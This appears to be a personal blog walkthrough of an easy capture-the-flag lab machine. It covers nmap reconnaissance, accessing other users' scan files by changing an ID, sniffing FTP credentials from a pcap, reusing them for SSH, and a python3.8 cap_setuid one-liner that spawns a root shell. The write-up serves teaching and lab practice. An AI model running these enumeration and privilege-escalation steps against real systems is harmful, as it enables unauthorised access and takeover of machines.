Note: Iโm not an expert. Iโm writing this blog just to document my learning journey. ๐
Overview
Difficulty: Easy
Goal: Capture user.txt and root.txt flags
Focus Areas: PCAP analysis, FTP credential sniffing, capability-based privilege escalation
1. Reconnaissance
Nmap Scan
nmap -A 10.10.10.245 -oN cap.nmap
Findings:
- Port 21 (FTP): Open
- Port 22 (SSH): Open
- Port 80 (HTTP): Web server with a scan tool
2. Web Enumeration
Visit http://10.10.10.245 in your browser.
Observe Functionality
- You can run a "Security Snapshot" which redirects to
/data/[scan_id] - Example path:
/data/0
Try Other Scan IDs
- Visit
/data/1,/data/2, etc. - Observation: You can access other users' scans.
3. Analyze PCAP File
From one of the /data/[id] paths (likely /data/0), download a .pcap file.
- Save it as
1.pcap
Open in Wireshark
wireshark 1.pcap
Apply Filter
Use Wireshark filter:
ftp
Find Credentials
Look for:
USER nathan
PASS [password]
Right-click and follow the TCP stream to view the full conversation.
Suppose you find:
USER nathan
PASS [password]
4. SSH Access as Nathan
Use the FTP password to try SSH:
ssh nathan@10.10.10.245
Use the discovered password: cap@123
Get User Flag
cat ~/user.txt
โ User flag captured
5. Privilege Escalation
Check for SUID/Capabilities
getcap -r / 2>/dev/null
What Does getcap Mean?
The getcap command lists Linux file capabilities, which are fine-grained permissions that can be assigned to executables.
getcap -r / 2>/dev/null
-
r /: Recursively check every file starting from root (/) -
2>/dev/null: Hides "Permission denied" errors to keep output clean
You're looking for binaries with powerful capabilities like cap_setuid, which lets a program change its user ID (e.g., become root). If a binary like python3.8 has this capability, it can be abused to spawn a root shell.
These capabilities are separate from traditional SUID bits and are often overlooked.
Output Example
/usr/bin/python3.8 = cap_setuid+ep
Explanation
This means python3.8 has the capability to change its UID โ can be used to become root.
Exploit It
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Now check:
whoami
# root
Get Root Flag
cat /root/root.txt
โ Root flag captured
Summary
| Step | Description |
|---|---|
| Recon | Nmap scan reveals FTP, SSH, HTTP |
| Web Enum | Snapshot data exposed at /data/0
|
| PCAP | FTP creds leaked in packet capture |
| User Shell | SSH access with FTP creds |
| Priv Esc | Python binary with cap_setuid lets us become root |
Flags
-
User Flag: Obtained from
/home/nathan/user.txt -
Root Flag: Obtained from
/root/root.txt
Lessons Learned
- PCAPs can leak sensitive data if not secured
- FTP transmits credentials in plaintext
- Linux capabilities can be as dangerous as SUID if misconfigured
- Always restrict access to debug or internal diagnostic tools
Top comments (0)